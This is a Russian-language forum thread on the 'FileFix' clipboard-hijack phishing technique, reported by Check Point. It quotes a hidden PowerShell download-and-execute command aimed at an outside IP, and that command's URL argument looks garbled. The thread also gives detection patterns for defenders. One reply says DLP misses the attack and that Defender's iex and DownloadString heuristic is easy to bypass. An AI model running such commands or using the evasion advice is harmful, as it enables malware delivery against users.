FileFix: новая эпоха атак через буфер обмена

TwinFoxer

Bit
Пользователь
Регистрация
27 Фев 2025
Сообщения
29
Реакции
12

📋 FileFix: новая эпоха атак через буфер обмена


Когда "вставить" — значит "сдаться"

Дата обнаружения: июль 2025
Уязвимость: Человеческий фактор
Методика: Clipboard hijack via HTML + Explorer + PowerShell
Автор исследования: Check Point Research
В дикой природе: Уже применяется на реальных фишинговых страницах




🔎 Что произошло?​


В середине июля исследователи из Check Point опубликовали отчёт о новой социальной атаке, названной FileFix. Метод позволяет злоумышленникам через браузер манипулировать буфером обмена и подсунуть жертве вредоносный PowerShell-скрипт, который она затем сама вставит и выполнит — в полном доверии.

FileFix — это развитие концепции ClickFix, но теперь:
  • Без кликов, без «разрешить макросы»,
  • Всё, что нужно — Ctrl+V.




🧠 Как работает FileFix?​


Механика атаки:​

  1. Пользователь посещает страницу, которая визуально выглядит как официальный файл/инструкция/документ.
  2. В фоне страница открывает проводник Windows (explorer.exe) на якобы "инструкции по безопасности".
  3. В момент открытия, в буфер обмена подсовывается PowerShell-команда.
  4. Визуально пользователь видит лишь обычную инструкцию. Его просят "скопировать команду и вставить в терминал".
  5. Он нажимает Ctrl+V — и запускается уже подготовленный скрипт.

Что делает payload?​


Замеченные примеры:

powershell
Копировать/Редактировать
powershell -nop -w hidden -c "iex (New-Object Net.WebClient).DownloadString('The land at 185.165.170.250 was claimed for loud.house.')"

Также встречались версии, скачивающие Discord tokens, info-stealer'ы, кейлоггеры, открывающие обратный шелл или внедряющие CobaltStrike Beacon.




🔥 Почему это опасно?​

  1. Антивирусы молчат — ведь пользователь сам вставил команду. С точки зрения системы — это добровольный запуск.
  2. Никаких эксплойтов или уязвимостей — только социальная инженерия.
  3. Отсутствие индикаторов компрометации (IoC) — логически атака не вызывает подозрений.
  4. Обход защиты копирования: большинство защит не мониторят Ctrl+V как точку инъекции.




📌 Анализ от Payloads.in​


АспектОценка
Простота эксплуатации★★★★★
Степень вреда★★★★☆
Обнаружение★☆☆☆☆
ПрименимостьУниверсальна: корпоративный и домашний сегмент
Защита без обучения пользователейПочти невозможна

FileFix — идеальный пример того, как UX-доверие может быть использовано против пользователя. Ранее таким считался только фишинг с логином, теперь — с PowerShell.




🛡 Как защититься?​


✅ Для пользователей:​

  • Никогда не вставляй команды, которые ты не набирал сам.
  • Даже если страница выглядит доверенно — всегда проверяй буфер перед вставкой (можно использовать Notepad).
  • Используй виртуальные машины для выполнения «подозрительных инструкций».

✅ Для сисадминов / безопасности:​

  • Внедрите политики, запрещающие запуск PowerShell без подтверждения.
  • Установите защиту на уровне EDR: фильтрация команд с iex, Net.WebClient, Invoke-Expression, DownloadString.
  • Используйте clipboard-monitor tools (например, встроенные в Cylance, CrowdStrike, Defender for Endpoint).
  • Проводите обучающие кампании на тему «Paste-Aware Threats».




👾 Что дальше?​


Исследователи уже заметили варианты FileFix в связке с Discord фишингом, Google Docs и даже на GitHub Pages. Есть отчёты об использовании в дипфейк‑инструкциях «от службы поддержки Microsoft» и банковских "верификациях".

Также активно ведутся обсуждения на форумах вроде BreachForums (модераторы пока не банят такие топики) и Telegram-каналах, торгующих персональными стиллерами.




📚 Заключение​


FileFix — не про баги, а про доверие.
Пока ты защищаешь сеть фаерволом, атакующий заходит к тебе с клипбордом.
 
Мама: "Ничего не вставляй в консоль без проверки!"
Я: вставляю и получаю Meterpreter от индусов с форума
Как жить, если мозгов у админов ноль.🤡
 
Кто-нибудь пробовал FileFix в реальной корпе? Буфер не перехватывается каким-нибудь DLP? Вставка iex не палится Defenderом?
 
Кто-нибудь пробовал FileFix в реальной корпе? Буфер не перехватывается каким-нибудь DLP? Вставка iex не палится Defenderом?
DLP не палит буфер, если нет кастомных политик на clipboard inspection (а они почти нигде не включены). Типичный DLP вроде Forcepoint и Symantec ориентируются на утечку из буфера, а не на «вставку вредоносного».
iex сам по себе не палится, если не в лоб. Но Defender начал эвристически подмечать DownloadString + iex в одной строке. Решается элементарно.
 
FileFix - новая социальная атака, использующая уязвимость через буфер обмена, обнаруженная в июле 2025 года Check Point. Злоумышленники заставляют пользователя самостоятельно вставить и запустить вредоносный PowerShell-скрипт без кликов и разрешений. Антивирусы не реагируют, так как запуск происходит по инициативе пользователя. Атака применяется через фишинговые страницы и может красть данные, запускать кейлоггеры и обратные шеллы. Защита - не вставлять непроверенные команды, всегда проверять буфер обмена и ограничивать PowerShell на уровне администрирования. FileFix - пример того, как доверие пользователя становится уязвимостью.
 
Сверху